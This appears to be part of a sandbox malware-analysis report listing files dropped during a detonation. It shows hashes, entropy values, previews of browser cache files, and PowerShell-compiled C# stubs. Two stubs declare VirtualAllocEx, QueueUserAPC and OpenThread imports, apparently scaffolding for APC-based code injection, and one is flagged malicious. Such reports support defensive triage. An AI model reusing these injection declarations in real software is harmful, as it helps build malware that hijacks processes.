Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":74,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20808
Entropy (8bit):	5.301467861497523
Encrypted:	false
SSDEEP:	384:2MjAGcVXlblcqnzleZSug2f5vzBgF3OZO4QWwY4RXrqt:p86qhbz2RmF3Os4QWwY4RXrqt
MD5:	73455F3084C7DE1D4CCBA2D73F6CBA70
SHA1:	E12E181AFD2F73C896957919C3D0DF4254DDCC7B
SHA-256:	8050E2D5597F872F3514B304C42E0A378F6B54060A2CA93A83D726250D65125A
SHA-512:	78A2A14326FFE60D50E3F0EED2D3C9A6F109185C8A943C075A8953C3E7C22BDB48736DE1F832F0AA85FC29B083AD1CF5613E5FE841309FA5234E58BBBA980467
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":74,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\checksync[3].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20808
Entropy (8bit):	5.301467861497523
Encrypted:	false
SSDEEP:	384:2MjAGcVXlblcqnzleZSug2f5vzBgF3OZO4QWwY4RXrqt:p86qhbz2RmF3Os4QWwY4RXrqt
MD5:	73455F3084C7DE1D4CCBA2D73F6CBA70
SHA1:	E12E181AFD2F73C896957919C3D0DF4254DDCC7B
SHA-256:	8050E2D5597F872F3514B304C42E0A378F6B54060A2CA93A83D726250D65125A
SHA-512:	78A2A14326FFE60D50E3F0EED2D3C9A6F109185C8A943C075A8953C3E7C22BDB48736DE1F832F0AA85FC29B083AD1CF5613E5FE841309FA5234E58BBBA980467
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":74,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\e151e5[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	downloaded
Size (bytes):	43
Entropy (8bit):	3.122191481864228
Encrypted:	false
SSDEEP:	3:CUTxls/1h/:7lU/
MD5:	F8614595FBA50D96389708A4135776E4
SHA1:	D456164972B508172CEE9D1CC06D1EA35CA15C21
SHA-256:	7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
SHA-512:	299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\RES3C64.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	modified
Size (bytes):	2192
Entropy (8bit):	2.733188596984652
Encrypted:	false
SSDEEP:	24:xfLZZHhffhKdNfI+ycuZhN5akSHPNnq9Spfm9c:xfFZLKd91ul5a3Vq9c
MD5:	DDEC44426EE7B747DEA5F773E7EC5D6C
SHA1:	34ECDD1AA529CFE52F670FF799750988974BAD42
SHA-256:	8370AB8E2E12E5DE1BD638C4F9BDD323AB46F6D424F90FDFDD7A8F0800970942
SHA-512:	05DAC10DD710F46722BA11BDDAF396C8F019DD01FD1C3AA55C1FA23AD16B93220F9E1AD63D04DDD080B043EE94FA2701F6F144BD120BC21BE3A58F44BBFA93C5
Malicious:	false
Preview:	........X....c:\Users\user\AppData\Local\Temp\oywbpzxb\CSC2DF1E538346248FC93F32E43C7FD9A69.TMP...............CU..B\...d.?..#...........7.......C:\Users\user~1\AppData\Local\Temp\RES3C64.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES4E84.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	modified
Size (bytes):	2192
Entropy (8bit):	2.725586997309201
Encrypted:	false
SSDEEP:	24:xFXCCQZHihKdNfI+ycuZhNaGakStXPNnq9SpoDgm9c:xBCXZYKd91ulja3/q9hi
MD5:	DCCD2AD65347E7A957F1F7C29208F109
SHA1:	6926C15632599984A8ACADB38D8A016FE261B0A9
SHA-256:	863FC76A28A776FE642EE3019C98529B29E0EA0835AD25A9768748ED83B8DDE5
SHA-512:	67A2FCBCD355E819E97DAD946BBABAF1D2E276CA054C826757CB93B94EB152749326FE2B00DA758219C8D4D90389CCCC6CE4531CD02D8BE898EA7615C450F8B1
Malicious:	false
Preview:	........X....c:\Users\user\AppData\Local\Temp\augdh01w\CSCB69F8509801B4EEB877EE395DFB169E8.TMP...............r...`~",w..~.9..........7.......C:\Users\user~1\AppData\Local\Temp\RES4E84.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4b2oqajy.4l4.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vstgwle2.2h5.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\augdh01w\CSCB69F8509801B4EEB877EE395DFB169E8.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1010891844541435
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryMGak7YnqqtXPN5Dlq5J:+RI+ycuZhNaGakStXPNnqX
MD5:	722EE89EA111607E222C77D1187E8F39
SHA1:	42C5525B01DEB0D678101FBD5EEB89431EE2A0B1
SHA-256:	2E924B736C83BF65A2D5B49AEEB09CED0A1A02215D40BEADB5792FDDA06C17E7
SHA-512:	2993C2C0D5D35A25439608F6746027DC70B7BB0B6A208334BA6EA0A78C0AAFCE8BA27B1FADB42EBE03976C01F72571AA8D7EE17D653A527064504B29C0F77785
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.u.g.d.h.0.1.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.u.g.d.h.0.1.w...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	413
Entropy (8bit):	4.95469485629364
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJAMRSRa+eNMjSSRrEMx9SRHq1DAfWZSEehEFQy:V/DTLDfuA9eg5rEMx8u25hZy
MD5:	66C992425F6FC8E496BCA0C59044EDFD
SHA1:	9900C115A66028CD4E43BD8C2D01401357FD7579
SHA-256:	85FEE59EDA69CF81416915A84F0B8F7D8980A3A582B5FA6CC27A8C1340838B6C
SHA-512:	D674884748328A261D3CB4298F2EB63B37A77182869C5E3B462FAB917631FC1A6BB9B266CAD4E627F68C3016A2EEADCD508FDDBAF818E2F12E51B97325D9406D
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class iteocetkyp. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint hmli,uint odfa);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr cieceahsrf,IntPtr qipockeo,uint fmaounwoa,uint hdhq,uint fssner);.. }..}.

C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	377
Entropy (8bit):	5.265168407815453
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fty5Cn+zxs7+AEszIcNwi23fty5Czn:p37Lvkmb6KwZFACn+WZEJZFACzn
MD5:	47A6AA85787A3A12BF1F542BB837F3FC
SHA1:	032164A8ADAEB32CECF3EB9D6C0B1C8A07274672
SHA-256:	9312213105378D2544FDCA096B4D6BF27B1DEC2AFF840ED4E46F5F8299047A1B
SHA-512:	B1B7B1541C494685225DE0769188011A241356D9D95616417B90DDFDC67482B993A2610E286A195C7B80DA6781281B568E0DDD1C3D77A49A657C42BCEA9E38E3
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.0.cs"

C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6258169633981807
Encrypted:	false
SSDEEP:	24:etGSScM+WEei8MT38s2EGxfrdWC0PtkZfLBcLgEw7I+ycuZhNaGakStXPNnq:6SW7qMTMpEGxBWCdJLMgV1ulja3/q
MD5:	D3F3FEAE629D31B03E0D8949503910FF
SHA1:	09E6AB7CA87EB9CFF895B657273834451E5C43C3
SHA-256:	6FBE1E4D7BB96FA7EB7B15639D762AA4BE46054D9216845C01D49DBF47360832
SHA-512:	E5BFC7903641E3A5212360D7F37EF77C429CE790431B9A0344D81255BAD0C76E145B4F427E6AF067D6188E88448B36101656B629F18AF3EF6BD4D64E151532B8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............&.......................".............. =............ O............ W.....P ......f.........l.....q.....v...........................f.!...f...!.f.&...f.......+.....4.9.....=.......O.......W.......................................&..........<Module>.augdh01w.dll.iteocetkyp.W3

C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\oywbpzxb\CSC2DF1E538346248FC93F32E43C7FD9A69.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1129424357512563
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry7ak7YnqqHPN5Dlq5J:+RI+ycuZhN5akSHPNnqX
MD5:	4355FB08425C8EF0FB64CE3FFAB323FA
SHA1:	3B5B020FD8120714EECF88C1364D58729A3052FB
SHA-256:	82094434F0197EABCEFD38A2A95083A7D14AD8994BF23B3AFFBD8D6C2193DBB9
SHA-512:	D425B7137C0E6A1801480AE15C1CA03C26B057B11B47654ADE6F4DE96A036007B038BEE2B77B5F0E7D1CBD233E17B5FD50E9498E31A3D9FF8593B0214186091E
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.y.w.b.p.z.x.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.y.w.b.p.z.x.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	411
Entropy (8bit):	5.022568322197063
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJwQ5mMRSR7a1yTyShSRa+rVSSRnA/fh14v02JKy:V/DTLDfuqRySQ9rV5nA/TDy
MD5:	9B2165E59D51BB6E8E99190BD9C6BC8B
SHA1:	02B2F188D7654CA079ADA726994D383CF75FF114
SHA-256:	36E14435EE02B02C2B06087FF3750569342E8B8D8571F3F45E61AF50D3B03CEA
SHA-512:	20E05DE0D57D1F6F53FB3290CB1C533D152C6076E2451B0A463D5AD6342976F49F31DDA8CC668E3EC26775E75EE191B8DD44645F40F723667EE8376C84998209
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tseeoxqndt. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr jphxxkfdthf,IntPtr lnf,IntPtr uet);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint wwqqeyldba,uint ccghpcxllqj,IntPtr tobsn);.. }..}.

C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	377
Entropy (8bit):	5.253469082505904
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23f7uzxs7+AEszIcNwi23f74A:p37Lvkmb6KwZzuWZEJZz4A
MD5:	3D17DF32216A7BD48E80D796E5298DCC
SHA1:	A01A68F4BC7DA0192655C47003C8DACDF64AD22B
SHA-256:	D88C043116A9F06FE936083D683E05B9C06833D0275FD870D12EC78FDF32A09A
SHA-512:	CFE29D180430FDD5F70EE63E50DBF489E1C6EEBE08DF9081AA39C71160067C162D9A6E1EFB3F88D1815C98A8F13528A0DE46CC798E587F0466A35311C48C0B30
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.0.cs"

C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.637632168133124
Encrypted:	false
SSDEEP:	24:etGShlE8+mDR853RY0JGa4lp2tkZfnS86DZ0hEdI+ycuZhN5akSHPNnq:6hwmS5+XjJnSZ6Ed1ul5a3Vq
MD5:	320A34F246D68968BE2643B48B3B1E97
SHA1:	BE709082FDEA4E00A309D2BFCA948EAB3401FCAD
SHA-256:	D763F3C7E53CDBABDC243BB0C1B738A65363268EA5344DA3C51058BCA1E24E75
SHA-512:	D66714D9DB9D1362382C5EB4FBBCEF3EEB296BD5618E84B92C77A9EFD0BFCE0FA540F38C92F284FC243EBAA663F21AA8ECB546D0C3B42D56F8662353211A7B22
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............%.......................".............. =............ J............ ].....P ......h.........n.....z.....~.....................h. ...h...!.h.%...h............3.8.....=.......J.......].......................................&........<Module>.oywbpzxb.dll.tseeoxqndt.W32.mscorl

C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\~DF2DD4708DD02ECB8C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	14037
Entropy (8bit):	1.0301355135729575
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loL9loL9lWnR2zN5oLbuvZ03RwzC5m5mR4v:kBqoIsynRSo46y
MD5:	37D0316C22560E6A3762C64C7793A7A7
SHA1:	A70122E7E901D32B925F0EE42CE796F2C0C5A26E
SHA-256:	BFCF7D0F0AB653BB91BF97A40B3B80AB84E160E1C10B32A40D0AE5DA82BD689D
SHA-512:	35FD0AA212A56C918293A031EC1BC28389FF4C53F5D9A7C0FEAE505003477FDA1C1019E7A9149C9A34F4DAE2E217605F126E2EF1C91684B15EC9F3A040C30FBF
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFAF0F83522416AA15.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40169
Entropy (8bit):	0.6758952852780944
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+qMWfM1aJjiw9u/0MaJjiw9u/0/aJjiw9u/0Q:kBqoxKAuqR+qMWfM1222J26
MD5:	5452AA383CF30908297E0BF643FC6655
SHA1:	CE7F027086A7102A162B6C3CD5214B153471478C
SHA-256:	AFDBFFA4A485890123E244674329BFB2B2251E40F2FA0A99043218355625EC6C
SHA-512:	DEEC46946858B2FF4E8E6FE75985CC160B4E7F705D046DB8D260A831E09D7C4348A70BC7D5F3455E72F71A0CC36A12417A4CFAE13E03C8722F7710294EAE3077
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFBBE82018C43F3C1D.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40241
Entropy (8bit):	0.6872854194582836
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+eYSbI9Qk9YMQk9YiMQk9YU:kBqoxKAuqR+eYSbI97eM7er7eU
MD5:	D59B8548BDD486563F4CA951419709FB
SHA1:	6D92EF59D8915D8BE82D0F6D93DD50788AB0CEFD
SHA-256:	57EE3246755FD4A064D880429C72CC301CF3AB5F94654A79C5B57373F76CE497
